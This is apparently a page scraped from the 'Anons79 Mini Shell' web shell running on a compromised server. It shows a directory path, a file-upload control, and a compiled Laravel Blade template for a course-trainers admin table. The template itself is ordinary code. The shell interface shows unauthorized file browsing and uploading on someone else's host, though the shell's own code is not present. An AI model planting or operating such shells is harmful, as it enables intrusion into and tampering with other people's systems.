Anons79 Mini Shell

Directory : /home/aplikasiposinfo/.trash/storage.2/framework/views/
Upload File :
Current File : /home/aplikasiposinfo/.trash/storage.2/framework/views/d9c7e01a5188e0b56305a8df8fbe1194.php

<div class="card-body p-0">
    <div class="table-responsive">
        <table class="table table-hover table-bordered table-striped default" id="course-trainers-table">
            <thead>
            <tr>
                <th>Course</th>
                <th>Trainer</th>
                <th>Users</th>
                <th colspan="3">Action</th>
            </tr>
            </thead>
            <tbody>
            <?php $__currentLoopData = $courseTrainers; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $courseTrainer): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                <tr>
                    <td><?php echo e($courseTrainer->course->name); ?></td>
                    <td><?php echo e($courseTrainer->trainer->full_name); ?></td>
                    <td><?php echo e($courseTrainer->user->name); ?></td>
                    <td  style="width: 120px">
                        <div class='btn-group'>
                            <a href="<?php echo e(route('courseTrainers.show', [$courseTrainer->id])); ?>"
                               class='btn btn-info btn-sm'>
                                <i class="fa fa-eye"></i>
                            </a>
                            <?php if (app(\Illuminate\Contracts\Auth\Access\Gate::class)->check('courseTrainers.edit')): ?>
                            <a href="<?php echo e(route('courseTrainers.edit', [$courseTrainer->id])); ?>"
                                   class='btn btn-warning btn-sm'>
                                    <i class="fa fa-edit"></i>
                                </a>
                            <?php endif; ?>
                            <?php if (app(\Illuminate\Contracts\Auth\Access\Gate::class)->check('courseTrainers.destroy')): ?>
                            <?php echo Form::open(['route' => ['courseTrainers.destroy', $courseTrainer->id], 'method' => 'delete']); ?>

                                <?php echo Form::button('<i class="fa fa-trash"></i>', ['type' => 'submit', 'class' => 'btn btn-danger btn-sm', 'onclick' => "return confirm('Are you sure?')"]); ?>

                                <?php echo Form::close(); ?>

                            <?php endif; ?>
                        </div>
                    </td>
                </tr>
            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
            </tbody>
        </table>
    </div>

    <div class="card-footer clearfix">
        <div class="float-right">
            <?php echo $__env->make('adminlte-templates::common.paginate', ['records' => $courseTrainers], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
        </div>
    </div>
</div>
<?php /**PATH C:\laragon\www\web_mudahcoding_2024\resources\views/course_trainers/table.blade.php ENDPATH**/ ?>

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]